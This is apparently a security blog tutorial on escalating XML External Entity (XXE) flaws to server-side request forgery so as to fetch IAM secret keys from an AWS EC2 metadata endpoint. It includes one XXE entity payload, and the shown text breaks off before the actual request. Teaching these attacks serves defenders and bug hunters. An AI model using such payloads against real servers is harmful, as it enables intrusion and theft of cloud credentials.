Exploiting XXE for SSRF

Retrieving IAM credentials of EC2 instance using xxe and ssrf

Server-Side Request Forgery (SSRF):- SSRF is an attack in which an attacker can force a vulnerable server to trigger malicious requests to third-party servers and or to internal resources.

For more on SSRF and its exploitation check my previous blog:

https://medium.com/bugbountywriteup/exploiting-ssrf-for-admin-access-31c30457cc44

XML External Entity (XXE): An XML External Entity attack is a type of attack against an application that parses XML input. It often allows an attacker to view files on the application server file system, to interact with any backend or external systems that the application itself can access and it can be escalated to RCE as well.

For more on XXE check my previous blog:

https://medium.com/@gupta.bless/exploitation-xml-external-entity-xxe-1f5f3e7bc5c4

How to escalate XXE vulnerability to perform SSRF execution?

Exploiting this helps an attacker to access local infrastructure or internal network bypassing the WAF which can lead to sensitive information disclosure.

In order to utilize SSRF through the escalation of the XXE, the XML entity must be identified by the URL that we want to target and use the value of the data with defined entity. By using a given entity in data value i.e. returned in application’s response. Then we can able to view the response from the URL within the application response.

<!DOCTYPE foo [ <!ENTITY id SYSTEM "http://localhost.com/"> ]>

In this XXE payload, “id” which is an external entity and make a HTTP back connect to access the internal infrastructure.

Exploitation:

We have a server which is vulnerable to XXE, the server provides access to internal network. The webserver is running an AWS metadata endpoint on its default URL. We need to have to fetch the IAM secret access key from the EC2 metadata endpoint.

Let’s suppose the vulnerable EC2 instance is located at this IP Address http://192.168.1.220.

The below request denotes that the application is using XML.